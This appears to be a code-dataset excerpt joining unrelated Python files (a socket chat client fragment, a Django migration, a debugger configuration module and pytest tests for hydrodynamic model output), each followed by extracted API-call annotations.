print("(+) Connected to %s(%s):%d\n" %
(self._host, sock_addr[0], self._port))
else:
print("(+) Connected to %s:%d\n" % (self._host, self._port))
self._sock = sock
def _sending_data_proccess(self, code, data):
try:
buf = code + " " + data + "\n"
self._sock.sendall(buf.encode())
except Exception as ex:
print("(!) sending data proccess: %s\n" % ex)
def _receive_data(self):
while self._connected.is_set():
try:
readable, _, _ = select.select([self._sock], [], [], 0.05)
for s in readable:
buf = s.recv(10240)
if len(buf) == 0:
self._connected.clear()
break
self._received_data_proccess(buf)
if not self._send_q.empty():
d = self._send_q.get()
if d[0] == "QUT":
self._connected.clear()
self._sending_data_proccess(d[0], d[1])
except select.error as ex:
print("(!) select: %s\n" % ex)
self._sending_data_proccess("QUT", "")
self._connected.clear()
self._recv_q.put("EXT")
print("(*) Disconnecting to server...\n")
self._sock.close()
print("(-) Disconnected\n")
def _received_data_proccess(self, data):
try:
# print("#DEBUG Client# - ", data)
data = data.decode().splitlines()
for buf in data:
buf = buf.strip().split(" ")
if buf[0] == "ERR":
if "FULL" in buf[1]:
print("Server full, closing connection with server !\n")
if "UNAVAILABLE" in buf[1]:
print("Nickname unavailable\n")
self._connected.clear()
else:
self._recv_q.put(buf)
except Exception as ex:
print("(!) received data process: %s\n" % ex)
|
[
"threading.Thread",
"socket.socket",
"socket.getaddrinfo",
"select.select",
"threading.Event",
"signal.signal"
] |
[((440, 457), 'threading.Event', 'threading.Event', ([], {}), '()\n', (455, 457), False, 'import threading\n'), ((489, 532), 'threading.Thread', 'threading.Thread', ([], {'target': 'self._receive_data'}), '(target=self._receive_data)\n', (505, 532), False, 'import threading\n'), ((728, 813), 'socket.getaddrinfo', 'socket.getaddrinfo', (['self._host', 'self._port', 'socket.AF_UNSPEC', 'socket.SOCK_STREAM'], {}), '(self._host, self._port, socket.AF_UNSPEC, socket.SOCK_STREAM\n )\n', (746, 813), False, 'import socket\n'), ((366, 410), 'signal.signal', 'signal.signal', (['signal.SIGUSR2', 'self._handler'], {}), '(signal.SIGUSR2, self._handler)\n', (379, 410), False, 'import signal\n'), ((916, 951), 'socket.socket', 'socket.socket', (['ai_family', 'sock_type'], {}), '(ai_family, sock_type)\n', (929, 951), False, 'import socket\n'), ((1998, 2039), 'select.select', 'select.select', (['[self._sock]', '[]', '[]', '(0.05)'], {}), '([self._sock], [], [], 0.05)\n', (2011, 2039), False, 'import select\n')]
|
# Generated by Django 2.2.10 on 2020-03-07 07:54
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('anijung', '0002_quote'),
]
operations = [
migrations.AlterField(
model_name='quote',
name='case',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='anijung.Case'),
),
]
|
[
"django.db.models.ForeignKey"
] |
[((354, 463), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'null': '(True)', 'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""anijung.Case"""'}), "(blank=True, null=True, on_delete=django.db.models.\n deletion.CASCADE, to='anijung.Case')\n", (371, 463), False, 'from django.db import migrations, models\n')]
|
__all__ = [
"C2TConfig"
, "Run"
, "get_new_rsp"
, "DebugClient"
, "DebugServer"
, "TestBuilder"
]
from collections import (
namedtuple
)
from common import (
pypath
)
with pypath("..pyrsp"):
from pyrsp.rsp import (
RSP,
archmap
)
# CPU Testing Tool configuration components
C2TConfig = namedtuple(
"C2TConfig",
"rsp_target qemu gdbserver target_compiler oracle_compiler"
)
Run = namedtuple(
"Run",
"executable args"
)
def get_new_rsp(regs, pc, regsize, little_endian = True):
class CustomRSP(RSP):
def __init__(self, *a, **kw):
self.arch = dict(
regs = regs,
endian = little_endian,
bitsize = regsize
)
self.pc_reg = pc
super(CustomRSP, self).__init__(*a, **kw)
return CustomRSP
class DebugClient(object):
def __init__(self, march, new_rsp = None, user = False, sp = None,
qemu_reset = False, test_timeout = 10.0
):
self.march = march
if march in archmap:
self.rsp = archmap[march]
elif new_rsp is not None:
self.rsp = new_rsp
else:
self.rsp = None
self.user = user
self.sp = sp
self.qemu_reset = qemu_reset
self.test_timeout = test_timeout
class DebugServer(object):
def __init__(self, run):
self.run = run
@property
def run_script(self):
return ' '.join(self.run)
class TestBuilder(tuple):
def __new__(cls, *runs):
return tuple.__new__(cls, runs)
# TODO: how to operate without runs?
@property
def run_script(self):
for run in self:
yield ' '.join(run)
|
[
"common.pypath",
"collections.namedtuple"
] |
[((334, 422), 'collections.namedtuple', 'namedtuple', (['"""C2TConfig"""', '"""rsp_target qemu gdbserver target_compiler oracle_compiler"""'], {}), "('C2TConfig',\n 'rsp_target qemu gdbserver target_compiler oracle_compiler')\n", (344, 422), False, 'from collections import namedtuple\n'), ((435, 471), 'collections.namedtuple', 'namedtuple', (['"""Run"""', '"""executable args"""'], {}), "('Run', 'executable args')\n", (445, 471), False, 'from collections import namedtuple\n'), ((195, 212), 'common.pypath', 'pypath', (['"""..pyrsp"""'], {}), "('..pyrsp')\n", (201, 212), False, 'from common import pypath\n')]
|
# -*- coding: utf-8 -*-
import warnings
import numpy as np
import pandas as pd
import pytest
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=DeprecationWarning)
import xarray as xr
from snl_d3d_cec_verify.cases import CaseStudy
from snl_d3d_cec_verify.result.faces import (_check_case_study,
_faces_frame_to_slice,
_faces_frame_to_depth,
_map_to_faces_frame_with_tke,
_map_to_faces_frame,
_get_quadrilateral_centre,
_FMFaces,
_trim_to_faces_frame,
_StructuredFaces)
def test_check_case_study_error():
case = CaseStudy(dx=[1, 2, 3])
with pytest.raises(ValueError) as excinfo:
_check_case_study(case)
assert "case study must have length one" in str(excinfo)
@pytest.fixture
def faces_frame_fm(data_dir):
csv_path = data_dir / "output" / "faces_frame_fm.csv"
frame = pd.read_csv(csv_path, parse_dates=["time"])
times = frame.time.unique()
return frame[frame.time == times[-1]]
@pytest.fixture
def faces_frame_structured(data_dir):
csv_path = data_dir / "output" / "faces_frame_structured.csv"
frame = pd.read_csv(csv_path, parse_dates=["time"])
times = frame.time.unique()
return frame[frame.time == times[-1]]
def test_faces_frame_to_slice_sigma(faces_frame_fm):
ts = pd.Timestamp("2001-01-01 01:00:00")
sigma = -0.5
ds = _faces_frame_to_slice(faces_frame_fm, ts, "sigma", sigma)
assert isinstance(ds, xr.Dataset)
assert len(ds["$x$"]) == 18
assert len(ds["$y$"]) == 4
assert np.isclose(ds["$x$"].min(), 0.5)
assert np.isclose(ds["$x$"].max(), 17.5)
assert np.isclose(ds["$y$"].min(), 1.5)
assert np.isclose(ds["$y$"].max(), 4.5)
assert ds[r"$\sigma$"].values.take(0) == sigma
assert ds.time.values.take(0) == ts
assert ds["$z$"].min() > -1.0012
assert ds["$z$"].max() < -1
# Same bounds as the frame
assert ds["$u$"].min() >= faces_frame_fm["u"].min()
assert ds["$u$"].max() <= faces_frame_fm["u"].max()
assert ds["$v$"].min() >= faces_frame_fm["v"].min()
assert ds["$v$"].max() <= faces_frame_fm["v"].max()
assert ds["$w$"].min() >= faces_frame_fm["w"].min()
assert ds["$w$"].max() <= faces_frame_fm["w"].max()
def test_faces_frame_structured_to_slice_sigma(faces_frame_structured):
ts = pd.Timestamp("2001-01-01 01:00:00")
sigma = -0.75
ds = _faces_frame_to_slice(faces_frame_structured, ts, "sigma", sigma)
assert isinstance(ds, xr.Dataset)
assert len(ds["$x$"]) == 18
assert len(ds["$y$"]) == 4
assert np.isclose(ds["$x$"].min(), 0.5)
assert np.isclose(ds["$x$"].max(), 17.5)
assert np.isclose(ds["$y$"].min(), 1.5)
assert np.isclose(ds["$y$"].max(), 4.5)
assert ds[r"$\sigma$"].values.take(0) == sigma
assert ds.time.values.take(0) == ts
assert ds["$z$"].min() > -1.504
assert ds["$z$"].max() < -1.5
# Same bounds as the frame
assert ds["$u$"].min() >= faces_frame_structured["u"].min()
assert ds["$u$"].max() <= faces_frame_structured["u"].max()
assert ds["$v$"].min() >= faces_frame_structured["v"].min()
assert ds["$v$"].max() <= faces_frame_structured["v"].max()
assert ds["$w$"].min() >= faces_frame_structured["w"].min()
assert ds["$w$"].max() <= faces_frame_structured["w"].max()
assert ds["$k$"].min() >= 0
assert ds["$k$"].min() >= faces_frame_structured["tke"].min()
assert ds["$k$"].max() <= faces_frame_structured["tke"].max()
def test_faces_frame_to_slice_sigma_extrapolate_forward(faces_frame_fm):
ts = pd.Timestamp("2001-01-01 01:00:00")
sigma = 0.1
ds = _faces_frame_to_slice(faces_frame_fm, ts, "sigma", sigma)
assert ds["$z$"].min() > 0.2
assert ds["$z$"].max() < 0.2003
def test_faces_frame_to_slice_sigma_extrapolate_backward(faces_frame_fm):
ts = pd.Timestamp("2001-01-01 01:00:00")
sigma = -1.1
ds = _faces_frame_to_slice(faces_frame_fm, ts, "sigma", sigma)
assert ds["$z$"].min() > -2.203
assert ds["$z$"].max() < -2.2
def test_faces_frame_to_slice_z(faces_frame_fm):
ts = pd.Timestamp("2001-01-01 01:00:00")
z = -1
ds = _faces_frame_to_slice(faces_frame_fm, ts, "z", z)
assert isinstance(ds, xr.Dataset)
assert len(ds["$x$"]) == 18
assert len(ds["$y$"]) == 4
assert np.isclose(ds["$x$"].min(), 0.5)
assert np.isclose(ds["$x$"].max(), 17.5)
assert np.isclose(ds["$y$"].min(), 1.5)
assert np.isclose(ds["$y$"].max(), 4.5)
assert ds["$z$"].values.take(0) == z
assert ds.time.values.take(0) == ts
assert ds[r"$\sigma$"].values.min() >= -1
assert ds["$z$"].max() < 1.002
# Same bounds as the frame
assert ds["$u$"].min() >= faces_frame_fm["u"].min()
assert ds["$u$"].max() <= faces_frame_fm["u"].max()
assert ds["$v$"].min() >= faces_frame_fm["v"].min()
assert ds["$v$"].max() <= faces_frame_fm["v"].max()
assert ds["$w$"].min() >= faces_frame_fm["w"].min()
assert ds["$w$"].max() <= faces_frame_fm["w"].max()
def test_faces_frame_to_slice_error():
with pytest.raises(RuntimeError) as excinfo:
_faces_frame_to_slice("mock", "mock", "mock", "mock")
assert "Given key is not valid" in str(excinfo)
def test_faces_frame_to_depth(faces_frame_fm):
ts = pd.Timestamp("2001-01-01 01:00:00")
da = _faces_frame_to_depth(faces_frame_fm, ts)
assert isinstance(da, xr.DataArray)
assert len(da["$x$"]) == 18
assert len(da["$y$"]) == 4
assert da.time.values.take(0) == ts
# Same bounds as the frame
assert da.min() >= faces_frame_fm["depth"].min()
assert da.max() <= faces_frame_fm["depth"].max()
def test_faces_frame_structured_to_depth(faces_frame_structured):
ts = pd.Timestamp("2001-01-01 01:00:00")
da = _faces_frame_to_depth(faces_frame_structured, ts)
assert isinstance(da, xr.DataArray)
assert len(da["$x$"]) == 18
assert len(da["$y$"]) == 4
assert da.time.values.take(0) == ts
# Same bounds as the frame
assert da.min() >= faces_frame_structured["depth"].min()
assert da.max() <= faces_frame_structured["depth"].max()
def test_faces_load_t_step_first(faces):
t_step = -1
expected_t_step = faces._resolve_t_step(t_step)
faces._load_t_step(t_step)
assert len(faces._frame) == 18 * 4 * 7
assert expected_t_step in faces._t_steps
assert faces._t_steps[expected_t_step] == \
pd.Timestamp('2001-01-01 01:00:00')
def test_faces_load_t_step_second(faces):
faces._load_t_step(-1)
faces._load_t_step(0)
assert len(faces._frame) == 18 * 4 * 7 * 2
assert len(faces._t_steps) == 2
assert set(faces._frame["time"]) == set([
pd.Timestamp('2001-01-01 01:00:00'),
pd.Timestamp('2001-01-01')])
def test_faces_load_t_step_no_repeat(faces):
faces._load_t_step(-1)
faces._load_t_step(1)
assert len(faces._frame) == 18 * 4 * 7
assert len(faces._t_steps) == 1
def test_faces_extract_depth(mocker, faces):
mock = mocker.patch('snl_d3d_cec_verify.result.faces.'
'_faces_frame_to_depth')
faces.extract_depth(-1)
mock.assert_called()
def test_faces_extract_sigma(mocker, faces):
mock = mocker.patch('snl_d3d_cec_verify.result.faces.'
'_faces_frame_to_slice')
faces.extract_sigma(-1, 0)
mock.assert_called()
assert 'sigma' in mock.call_args.args[2]
def test_faces_extract_sigma_interp(faces):
t_step = -1
sigma = -0.5
x = 1
y = 3
ds = faces.extract_sigma(t_step, sigma, x, y)
t_step = faces._resolve_t_step(t_step)
ts = faces._t_steps[t_step]
assert isinstance(ds, xr.Dataset)
assert ds[r"$\sigma$"].values.take(0) == sigma
assert ds.time.values.take(0) == ts
assert ds["$x$"].values.take(0) == x
assert ds["$y$"].values.take(0) == y
assert np.isclose(ds["$z$"].values, -1.00114767)
# Same bounds as the frame
assert (faces._frame["u"].min() <= ds["$u$"].values.take(0) <=
faces._frame["u"].max())
assert (faces._frame["v"].min() <= ds["$v$"].values.take(0) <=
faces._frame["v"].max())
assert (faces._frame["w"].min() <= ds["$w$"].values.take(0) <=
faces._frame["w"].max())
def test_faces_extract_z(mocker, faces):
mock = mocker.patch('snl_d3d_cec_verify.result.faces.'
'_faces_frame_to_slice')
faces.extract_z(-1, -1)
mock.assert_called()
assert 'z' in mock.call_args.args[2]
def test_faces_extract_z_interp(faces):
t_step = -1
z = -1
x = 1
y = 3
ds = faces.extract_z(t_step, z, x, y)
t_step = faces._resolve_t_step(t_step)
ts = faces._t_steps[t_step]
assert isinstance(ds, xr.Dataset)
assert ds["$z$"].values.take(0) == z
assert ds.time.values.take(0) == ts
assert ds["$x$"].values.take(0) == x
assert ds["$y$"].values.take(0) == y
assert np.isclose(ds[r"$\sigma$"].values, -0.49942682)
# Same bounds as the frame
assert (faces._frame["u"].min() <= ds["$u$"].values.take(0) <=
faces._frame["u"].max())
assert (faces._frame["v"].min() <= ds["$v$"].values.take(0) <=
faces._frame["v"].max())
assert (faces._frame["w"].min() <= ds["$w$"].values.take(0) <=
faces._frame["w"].max())
@pytest.mark.parametrize("x, y", [
("mock", None),
(None, "mock")])
def test_faces_extract_interp_error(faces, x, y):
with pytest.raises(RuntimeError) as excinfo:
faces.extract_z("mock", "mock", x, y)
assert "x and y must both be set" in str(excinfo)
def test_faces_extract_turbine_z(mocker, faces):
case = CaseStudy()
offset_z = 0.5
t_step = -1
mock = mocker.patch.object(faces, 'extract_z')
faces.extract_turbine_z(t_step, case, offset_z)
mock.assert_called_with(t_step, case.turb_pos_z + offset_z)
def test_faces_extract_turbine_centreline(mocker, faces):
case = CaseStudy()
t_step = -1
x_step = 0.5
offset_x = 0.5
offset_y = 0.5
offset_z = 0.5
mock = mocker.patch.object(faces, 'extract_z')
faces.extract_turbine_centreline(t_step,
case,
x_step,
offset_x,
offset_y,
offset_z)
mock.assert_called()
assert mock.call_args.args[0] == t_step
assert mock.call_args.args[1] == case.turb_pos_z + offset_z
x = mock.call_args.args[2]
y = mock.call_args.args[3]
assert min(x) == case.turb_pos_x + offset_x
assert max(x) <= faces.xmax
assert np.unique(np.diff(x)).take(0) == x_step
assert set(y) == set([case.turb_pos_y + offset_y])
def test_faces_extract_turbine_centre(mocker, faces):
case = CaseStudy()
t_step = -1
offset_x = 0.5
offset_y = 0.5
offset_z = 0.5
mock = mocker.patch.object(faces, 'extract_z')
faces.extract_turbine_centre(t_step,
case,
offset_x,
offset_y,
offset_z)
mock.assert_called()
assert mock.call_args.args[0] == t_step
assert mock.call_args.args[1] == case.turb_pos_z + offset_z
x = mock.call_args.args[2]
y = mock.call_args.args[3]
assert len(x) == 1
assert len(y) == 1
assert x[0] == case.turb_pos_x + offset_x
assert y[0] == case.turb_pos_y + offset_y
def test_map_to_faces_frame_with_tke(data_dir):
map_path = data_dir / "output" / "FlowFM_map.nc"
faces_frame = _map_to_faces_frame_with_tke(map_path, -1)
assert isinstance(faces_frame, pd.DataFrame)
assert len(faces_frame) == 18 * 4 * 7
assert faces_frame.columns.to_list() == ["x",
"y",
"z",
"sigma",
"time",
"depth",
"u",
"v",
"w",
"tke"]
assert np.isclose(faces_frame["x"].min(), 0.5)
assert np.isclose(faces_frame["x"].max(), 17.5)
assert np.isclose(faces_frame["y"].min(), 1.5)
assert np.isclose(faces_frame["y"].max(), 4.5)
assert -2.003 < faces_frame["z"].min() < -4 / 3
assert -2 / 3 < faces_frame["z"].max() <= 0
assert np.isclose(faces_frame["sigma"].unique(),
[-1.,
-0.83333333,
-0.66666667,
-0.5,
-0.33333333,
-0.16666667,
0.]).all()
assert set(faces_frame["time"]) == set([
pd.Timestamp('2001-01-01 01:00:00')])
assert faces_frame["depth"].min() > 2
assert faces_frame["depth"].max() < 2.003
assert faces_frame["u"].min() > 0.57
assert faces_frame["u"].max() < 0.9
assert faces_frame["v"].min() > -1e-15
assert faces_frame["v"].max() < 1e-15
assert faces_frame["w"].min() > -0.02
assert faces_frame["w"].max() < 0.02
assert faces_frame["tke"].min() > 0
assert faces_frame["tke"].max() < 0.0089
sigma_slice = _faces_frame_to_slice(faces_frame,
pd.Timestamp('2001-01-01 01:00:00'),
"sigma",
-0.75)
assert np.isclose(sigma_slice["$z$"].values.mean(), -1.5009617997833038)
assert round(sigma_slice["$k$"].values.mean(), 5) == 0.00627
def test_map_to_faces_frame_with_tke_none(data_dir):
map_path = data_dir / "output" / "FlowFM_map.nc"
faces_frame = _map_to_faces_frame_with_tke(map_path)
assert isinstance(faces_frame, pd.DataFrame)
assert len(faces_frame) == 18 * 4 * 7 * 2
assert faces_frame.columns.to_list() == ["x",
"y",
"z",
"sigma",
"time",
"depth",
"u",
"v",
"w",
"tke"]
assert np.isclose(faces_frame["x"].min(), 0.5)
assert np.isclose(faces_frame["x"].max(), 17.5)
assert np.isclose(faces_frame["y"].min(), 1.5)
assert np.isclose(faces_frame["y"].max(), 4.5)
assert -2.003 < faces_frame["z"].min() < -4 / 3
assert -2 / 3 < faces_frame["z"].max() <= 0
assert np.isclose(faces_frame["sigma"].unique(),
[-1.,
-0.83333333,
-0.66666667,
-0.5,
-0.33333333,
-0.16666667,
0.]).all()
assert set(faces_frame["time"]) == set([
pd.Timestamp('2001-01-01 00:00:00'),
pd.Timestamp('2001-01-01 01:00:00')])
assert faces_frame["depth"].min() > 1.998
assert faces_frame["depth"].max() < 2.003
assert faces_frame["u"].min() >= 0
assert faces_frame["u"].max() < 0.9
assert faces_frame["v"].min() > -1e-15
assert faces_frame["v"].max() < 1e-15
assert faces_frame["w"].min() > -0.02
assert faces_frame["w"].max() < 0.02
assert faces_frame["tke"].min() > 0
assert faces_frame["tke"].max() < 0.0089
def test_map_to_faces_frame(data_dir):
map_path = data_dir / "output" / "FlowFM_map.nc"
faces_frame = _map_to_faces_frame(map_path, -1)
assert isinstance(faces_frame, pd.DataFrame)
assert len(faces_frame) == 216
assert faces_frame.columns.to_list() == ["x",
"y",
"z",
"sigma",
"time",
"depth",
"u",
"v",
"w"]
assert np.isclose(faces_frame["x"].min(), 0.5)
assert np.isclose(faces_frame["x"].max(), 17.5)
assert np.isclose(faces_frame["y"].min(), 1.5)
assert np.isclose(faces_frame["y"].max(), 4.5)
assert -2 < faces_frame["z"].min() < -4 / 3
assert -2 / 3 < faces_frame["z"].max() < 0
assert (faces_frame["sigma"].unique() == (-0.8333333333333334,
-0.5,
-0.16666666666666669)).all()
assert set(faces_frame["time"]) == set([
pd.Timestamp('2001-01-01 01:00:00')])
assert faces_frame["depth"].min() > 2
assert faces_frame["depth"].max() < 2.003
assert faces_frame["u"].min() > 0.6
assert faces_frame["u"].max() < 0.9
assert faces_frame["v"].min() > -1e-15
assert faces_frame["v"].max() < 1e-15
assert faces_frame["w"].min() > -0.02
assert faces_frame["w"].max() < 0.02
sigma_slice = _faces_frame_to_slice(faces_frame,
pd.Timestamp('2001-01-01 01:00:00'),
"sigma",
-0.75)
assert np.isclose(sigma_slice["$z$"].values.mean(), -1.5009617997833038)
def test_map_to_faces_frame_none(data_dir):
map_path = data_dir / "output" / "FlowFM_map.nc"
faces_frame = _map_to_faces_frame(map_path)
assert isinstance(faces_frame, pd.DataFrame)
assert len(faces_frame) == 432
assert faces_frame.columns.to_list() == ["x",
"y",
"z",
"sigma",
"time",
"depth",
"u",
"v",
"w"]
assert np.isclose(faces_frame["x"].min(), 0.5)
assert np.isclose(faces_frame["x"].max(), 17.5)
assert np.isclose(faces_frame["y"].min(), 1.5)
assert np.isclose(faces_frame["y"].max(), 4.5)
assert -2 < faces_frame["z"].min() < -4 / 3
assert -2 / 3 < faces_frame["z"].max() < 0
assert (faces_frame["sigma"].unique() == (-0.8333333333333334,
-0.5,
-0.16666666666666669)).all()
assert set(faces_frame["time"]) == set([
pd.Timestamp('2001-01-01 00:00:00'),
pd.Timestamp('2001-01-01 01:00:00')])
assert faces_frame["depth"].min() >= 2
assert faces_frame["depth"].max() < 2.003
assert faces_frame["u"].min() >= 0.
assert faces_frame["u"].max() < 0.9
assert faces_frame["v"].min() > -1e-15
assert faces_frame["v"].max() < 1e-15
assert faces_frame["w"].min() > -0.02
assert faces_frame["w"].max() < 0.02
def test_get_quadrilateral_centre():
densities = np.array([0, 0, 1, 1])
result = _get_quadrilateral_centre(densities)
assert result == 0.5
def test_FMFaces(mocker):
mock = mocker.patch(
'snl_d3d_cec_verify.result.faces._map_to_faces_frame_with_tke',
autospec=True)
path = "mock"
tstep = 0
test = _FMFaces(path, 2, 18)
test._get_faces_frame(tstep)
mock.assert_called_with(path, tstep)
def test_trim_to_faces_frame(data_dir):
trim_path = data_dir / "output" / "trim-D3D.nc"
faces_frame = _trim_to_faces_frame(trim_path, -1)
assert isinstance(faces_frame, pd.DataFrame)
assert len(faces_frame) == 216
assert faces_frame.columns.to_list() == ["x",
"y",
"z",
"sigma",
"time",
"depth",
"u",
"v",
"w",
"tke"]
assert np.isclose(faces_frame["x"].min(), 0.5)
assert np.isclose(faces_frame["x"].max(), 17.5)
assert np.isclose(faces_frame["y"].min(), 1.5)
assert np.isclose(faces_frame["y"].max(), 4.5)
assert -2 < faces_frame["z"].min() < -4 / 3
assert -2 / 3 < faces_frame["z"].max() < 0
assert np.isclose(faces_frame["sigma"].unique(),
(-0.16666667, -0.5, -0.83333331)).all()
assert set(faces_frame["time"]) == set([
pd.Timestamp('2001-01-01 01:00:00')])
assert faces_frame["depth"].min() > 2
assert faces_frame["depth"].max() < 2.005
assert faces_frame["u"].min() > 0.6
assert faces_frame["u"].max() < 0.9
assert faces_frame["v"].min() > -1e-2
assert faces_frame["v"].max() < 1e-2
assert faces_frame["w"].min() > -0.03
assert faces_frame["w"].max() < 0.02
assert faces_frame["tke"].min() > 0
assert faces_frame["tke"].max() < 0.004
def test_trim_to_faces_frame_none(data_dir):
trim_path = data_dir / "output" / "trim-D3D.nc"
faces_frame = _trim_to_faces_frame(trim_path)
assert isinstance(faces_frame, pd.DataFrame)
assert len(faces_frame) == 432
assert faces_frame.columns.to_list() == ["x",
"y",
"z",
"sigma",
"time",
"depth",
"u",
"v",
"w",
"tke"]
assert np.isclose(faces_frame["x"].min(), 0.5)
assert np.isclose(faces_frame["x"].max(), 17.5)
assert np.isclose(faces_frame["y"].min(), 1.5)
assert np.isclose(faces_frame["y"].max(), 4.5)
assert -2 < faces_frame["z"].min() < -4 / 3
assert -2 / 3 < faces_frame["z"].max() < 0
assert np.isclose(faces_frame["sigma"].unique(),
(-0.16666667, -0.5, -0.83333331)).all()
assert set(faces_frame["time"]) == set([
pd.Timestamp('2001-01-01 00:00:00'),
pd.Timestamp('2001-01-01 01:00:00')])
assert faces_frame["depth"].min() >= 2
assert faces_frame["depth"].max() < 2.005
assert faces_frame["u"].min() >= 0.
assert faces_frame["u"].max() < 0.9
assert faces_frame["v"].min() > -1e-2
assert faces_frame["v"].max() < 1e-2
assert faces_frame["w"].min() > -0.03
assert faces_frame["w"].max() < 0.02
assert faces_frame["tke"].min() > 0
assert faces_frame["tke"].max() < 0.004
def test_StructuredFaces(mocker):
mock = mocker.patch('snl_d3d_cec_verify.result.faces._trim_to_faces_frame',
autospec=True)
path = "mock"
tstep = 0
test = _StructuredFaces(path, 2, 18)
test._get_faces_frame(tstep)
mock.assert_called_with(path, tstep)
|
[
"snl_d3d_cec_verify.result.faces._get_quadrilateral_centre",
"pandas.read_csv",
"numpy.isclose",
"snl_d3d_cec_verify.result.faces._faces_frame_to_slice",
"snl_d3d_cec_verify.result.faces._trim_to_faces_frame",
"pytest.mark.parametrize",
"pytest.raises",
"warnings.catch_warnings",
"snl_d3d_cec_verify.result.faces._FMFaces",
"snl_d3d_cec_verify.result.faces._check_case_study",
"snl_d3d_cec_verify.result.faces._map_to_faces_frame_with_tke",
"snl_d3d_cec_verify.result.faces._faces_frame_to_depth",
"snl_d3d_cec_verify.cases.CaseStudy",
"pandas.Timestamp",
"warnings.filterwarnings",
"numpy.diff",
"numpy.array",
"snl_d3d_cec_verify.result.faces._StructuredFaces",
"snl_d3d_cec_verify.result.faces._map_to_faces_frame"
] |
[((10168, 10233), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""x, y"""', "[('mock', None), (None, 'mock')]"], {}), "('x, y', [('mock', None), (None, 'mock')])\n", (10191, 10233), False, 'import pytest\n'), ((101, 126), 'warnings.catch_warnings', 'warnings.catch_warnings', ([], {}), '()\n', (124, 126), False, 'import warnings\n'), ((132, 194), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""'], {'category': 'DeprecationWarning'}), "('ignore', category=DeprecationWarning)\n", (155, 194), False, 'import warnings\n'), ((918, 941), 'snl_d3d_cec_verify.cases.CaseStudy', 'CaseStudy', ([], {'dx': '[1, 2, 3]'}), '(dx=[1, 2, 3])\n', (927, 941), False, 'from snl_d3d_cec_verify.cases import CaseStudy\n'), ((1210, 1253), 'pandas.read_csv', 'pd.read_csv', (['csv_path'], {'parse_dates': "['time']"}), "(csv_path, parse_dates=['time'])\n", (1221, 1253), True, 'import pandas as pd\n'), ((1462, 1505), 'pandas.read_csv', 'pd.read_csv', (['csv_path'], {'parse_dates': "['time']"}), "(csv_path, parse_dates=['time'])\n", (1473, 1505), True, 'import pandas as pd\n'), ((1649, 1684), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (1661, 1684), True, 'import pandas as pd\n'), ((1711, 1768), 'snl_d3d_cec_verify.result.faces._faces_frame_to_slice', '_faces_frame_to_slice', (['faces_frame_fm', 'ts', '"""sigma"""', 'sigma'], {}), "(faces_frame_fm, ts, 'sigma', sigma)\n", (1732, 1768), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((2692, 2727), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (2704, 2727), True, 'import pandas as pd\n'), ((2755, 2820), 'snl_d3d_cec_verify.result.faces._faces_frame_to_slice', '_faces_frame_to_slice', (['faces_frame_structured', 'ts', '"""sigma"""', 'sigma'], {}), "(faces_frame_structured, ts, 'sigma', sigma)\n", (2776, 2820), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((3958, 3993), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (3970, 3993), True, 'import pandas as pd\n'), ((4019, 4076), 'snl_d3d_cec_verify.result.faces._faces_frame_to_slice', '_faces_frame_to_slice', (['faces_frame_fm', 'ts', '"""sigma"""', 'sigma'], {}), "(faces_frame_fm, ts, 'sigma', sigma)\n", (4040, 4076), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((4241, 4276), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (4253, 4276), True, 'import pandas as pd\n'), ((4303, 4360), 'snl_d3d_cec_verify.result.faces._faces_frame_to_slice', '_faces_frame_to_slice', (['faces_frame_fm', 'ts', '"""sigma"""', 'sigma'], {}), "(faces_frame_fm, ts, 'sigma', sigma)\n", (4324, 4360), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((4501, 4536), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (4513, 4536), True, 'import pandas as pd\n'), ((4557, 4606), 'snl_d3d_cec_verify.result.faces._faces_frame_to_slice', '_faces_frame_to_slice', (['faces_frame_fm', 'ts', '"""z"""', 'z'], {}), "(faces_frame_fm, ts, 'z', z)\n", (4578, 4606), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((5721, 5756), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (5733, 5756), True, 'import pandas as pd\n'), ((5766, 5807), 'snl_d3d_cec_verify.result.faces._faces_frame_to_depth', '_faces_frame_to_depth', (['faces_frame_fm', 'ts'], {}), '(faces_frame_fm, ts)\n', (5787, 5807), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, 